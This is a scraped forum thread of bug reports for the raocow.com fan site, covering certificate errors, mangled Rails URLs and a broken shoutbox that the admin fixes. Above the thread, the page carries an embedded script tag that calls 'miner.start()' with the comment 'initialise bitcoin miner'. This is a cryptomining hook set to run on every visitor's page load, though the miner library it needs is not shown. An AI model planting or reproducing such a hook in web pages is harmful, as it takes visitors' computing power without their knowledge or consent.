<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxypge project

Meta [Bug reports/Site updates]

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Patchouli
Posts: 45
Joined: 4 years ago

Re: Meta [Bug reports/Site updates]

Postby Patchouli » 1 year ago

hui

Patchouli
Posts: 45
Joined: 4 years ago

Re: Meta [Bug reports/Site updates]

Postby Patchouli » 1 year ago

uiuiui

Patchouli
Posts: 45
Joined: 4 years ago

Re: Meta [Bug reports/Site updates]

Postby Patchouli » 1 year ago

uidu

User avatar
Mata Hari
Posts: 2047
Joined: 9 years ago

Re: Meta [Bug reports/Site updates]

Postby Mata Hari » 1 year ago



rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

ok i fixed the cache problem

User avatar
Sebby19
Posts: 1790
Joined: 9 years ago
Location: Winnipeg, Manitoba

Re: Meta [Bug reports/Site updates]

Postby Sebby19 » 1 year ago

This has been happening for a while, for there is something wrong with the certificates for raocow.com

My Wii U and 3DS have been telling me this problem for a couple months, but only yesterday did my PC also give me the same problem (Edge and IE). And before that, raocow.com was taking forever to load.

Here's what IE says:
"The security certificate presented by this website was issued for a different website's address.
The security certificate presented by this website was not issued by a trusted certificate authority."
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

Sebby19 wrote: This has been happening for a while, for there is something wrong with the certificates for raocow.com

My Wii U and 3DS have been telling me this problem for a couple months, but only yesterday did my PC also give me the same problem (Edge and IE). And before that, raocow.com was taking forever to load.

Here's what IE says:
"The security certificate presented by this website was issued for a different website's address.
The security certificate presented by this website was not issued by a trusted certificate authority."
your browsers are probably out of date

User avatar
Sebby19
Posts: 1790
Joined: 9 years ago
Location: Winnipeg, Manitoba

Re: Meta [Bug reports/Site updates]

Postby Sebby19 » 1 year ago

I doubt Microsoft Edge is. Here's the error it gives me:

There’s a problem with this website’s security certificate
This might mean that someone’s trying to fool you or steal any info you send to the server. You should close this site immediately.

>Go to my homepage instead
>Continue to this webpage (not recommended) <-- I click this and the page doesn't load anyways.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

User avatar
Grounder
Posts: 2697
Joined: 4 years ago

Re: Meta [Bug reports/Site updates]

Postby Grounder » 1 year ago

Sebby19 wrote: I doubt Microsoft Edge is. Here's the error it gives me:

There’s a problem with this website’s security certificate
This might mean that someone’s trying to fool you or steal any info you send to the server. You should close this site immediately.

>Go to my homepage instead
>Continue to this webpage (not recommended) <-- I click this and the page doesn't load anyways.
I know that this is kind of a meme, but using totally not Internet Explorer might be your problem.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 663
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 1 year ago

Updating and adding video series is broken again.
When trying to add videos/edit category:

Code: Select all

An error occurred during a connection to raocow.com:80.
SSL received a record that exceeded the maximum permissible length.
Error code: SSL_ERROR_RX_RECORD_TOO_LONG 
This is because the link goes to raocow.com:80 instead of raocow.com

But even if you change the URL to the correct one, when you try and submit the form it goes to httpss://raocow.com:80/series/393, which... I mean look at this poor mangled URL, I can see exactly what's happened to it and I can only pity its existence
BOB is an acronym for BOB is Only BOB etc.

rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

BobisOnlyBob wrote: Updating and adding video series is broken again.
When trying to add videos/edit category:

Code: Select all

An error occurred during a connection to raocow.com:80.
SSL received a record that exceeded the maximum permissible length.
Error code: SSL_ERROR_RX_RECORD_TOO_LONG 
This is because the link goes to raocow.com:80 instead of raocow.com

But even if you change the URL to the correct one, when you try and submit the form it goes to httpss://raocow.com:80/series/393, which... I mean look at this poor mangled URL, I can see exactly what's happened to it and I can only pity its existence
wat on earth

[those urls are autogenerated by rails so i have no idea]

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 663
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 1 year ago

you've set https somewhere in a config for the unsecure address and it's trying to add an s for the secure version because whoever wrote it was some sort of PHP-inhaling thicko

Also it's using the :80 version somewhere where it shouldn't be; again probably a config error

Finally you're using rails so that's just an outright mistake 8-)
BOB is an acronym for BOB is Only BOB etc.

rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

BobisOnlyBob wrote: you've set https somewhere in a config for the unsecure address and it's trying to add an s for the secure version because whoever wrote it was some sort of PHP-inhaling thicko

Also it's using the :80 version somewhere where it shouldn't be; again probably a config error

Finally you're using rails so that's just an outright mistake 8-)
yep gotta agree there @ the last part, but there's no https related config (that's probably the mistake and i'll dig into it later)

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 663
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 1 year ago

I've been able to update categories by editing the action field of forms, thanks inspect - so yeah it's all just frontend

edit: OH BOY SO LONG FRONTEND
BOB is an acronym for BOB is Only BOB etc.

rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

BobisOnlyBob wrote: I've been able to update categories by editing the action field of forms, thanks inspect - so yeah it's all just frontend

edit: OH BOY SO LONG FRONTEND
there we go, rolled back some software and now it works correctly

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 663
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 1 year ago

You might wanna Ctrl+F5. The CSS has gone AWOL. Also it's still doing httpss when updating categories, but the wayward :80s are behind us now.

Sorry for all the posting, this isn't a priority or something you need to rush, just keeping you in the loop. :D
BOB is an acronym for BOB is Only BOB etc.

rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

BobisOnlyBob wrote: You might wanna Ctrl+F5. The CSS has gone AWOL. Also it's still doing httpss when updating categories, but the wayward :80s are behind us now.

Sorry for all the posting, this isn't a priority or something you need to rush, just keeping you in the loop. :D
christ.. i wish i built this all in something else now. rails tries to be too clever for its own good.

but hey at least the links work now. you can't have it all i guess

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 663
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 1 year ago

Holy poo, https has totally fallen off and when I go to an edit link, it redirects me to https://127.0.0.1:8080/users/sign_in :lol:
BOB is an acronym for BOB is Only BOB etc.

rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

BobisOnlyBob wrote: Holy poo, https has totally fallen off and when I go to an edit link, it redirects me to https://127.0.0.1:8080/users/sign_in :lol:
christ

i gave up and moved everything back to the old server for now

rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

did a bit of a php update since some pages needed features from a newer version

if anything is funky let me know

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 663
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 1 year ago

rena wrote: did a bit of a php update since some pages needed features from a newer version

if anything is funky let me know
You asked, so...

"add videos/edit category" in /series/:id currently directs to http://raocow.com:443/series/:id/edit, and the edit page itself also has its form's action set to :433

Code: Select all

<div class="page-head">
  <h1>Level Contest Japan videos</h1>
  <a href="/series/394/videos/random">random video</a> | <a href="http://raocow.com:443/series/394/edit">add videos/edit category</a>
</div>

Code: Select all

<form class="edit_category" id="edit_category" action="https://raocow.com:443/series/394" accept-charset="UTF-8" method="post">
[...]
</form>
BOB is an acronym for BOB is Only BOB etc.

rena
everyones a stupid hobo
Posts: 272
Joined: 1 year ago
Pronouns: spider

Re: Meta [Bug reports/Site updates]

Postby rena » 1 year ago

BobisOnlyBob wrote:
rena wrote: did a bit of a php update since some pages needed features from a newer version

if anything is funky let me know
You asked, so...

"add videos/edit category" in /series/:id currently directs to http://raocow.com:443/series/:id/edit, and the edit page itself also has its form's action set to :433

Code: Select all

<div class="page-head">
  <h1>Level Contest Japan videos</h1>
  <a href="/series/394/videos/random">random video</a> | <a href="http://raocow.com:443/series/394/edit">add videos/edit category</a>
</div>

Code: Select all

<form class="edit_category" id="edit_category" action="https://raocow.com:443/series/394" accept-charset="UTF-8" method="post">
[...]
</form>
ok i think i finally fixed all the stupid crappy urls
def default_url_options(options = nil)
{ :host => "raocow.com", :port => "" }
end
problem solved

feel free to let me know how i broke everything else this time

User avatar
BobisOnlyBob
Mythical Quadruped
Posts: 663
Joined: 5 years ago

Re: Meta [Bug reports/Site updates]

Postby BobisOnlyBob » 1 year ago

All good here! Might have broken something else but nothing I can see or care about :lol:
BOB is an acronym for BOB is Only BOB etc.

Jongseok
Posts: 319
Joined: 2 years ago
Location: Seoul, Korea

Re: Meta [Bug reports/Site updates]

Postby Jongseok » 1 year ago

My web browser's Java Script is enabled. But shoutbox doesn't work. When I submit, then it says {"title":"Error","error":"Sorry, posting in the shoutbox is only supported when JavaScript is enabled","status":500}
OS: Android 4.1

User avatar
Ashan
The world has become a place
Posts: 1589
Joined: 8 years ago
First name: Hayden
Location: Saskatchewan

Re: Meta [Bug reports/Site updates]

Postby Ashan » 1 year ago

This is what the registered tag does:

this bbcode is defined in bbcode.php
Image
Image
Image
Image
Image
Image


Return to “the gazebo”

Who is online

Users browsing this forum: No registered users and 9 guests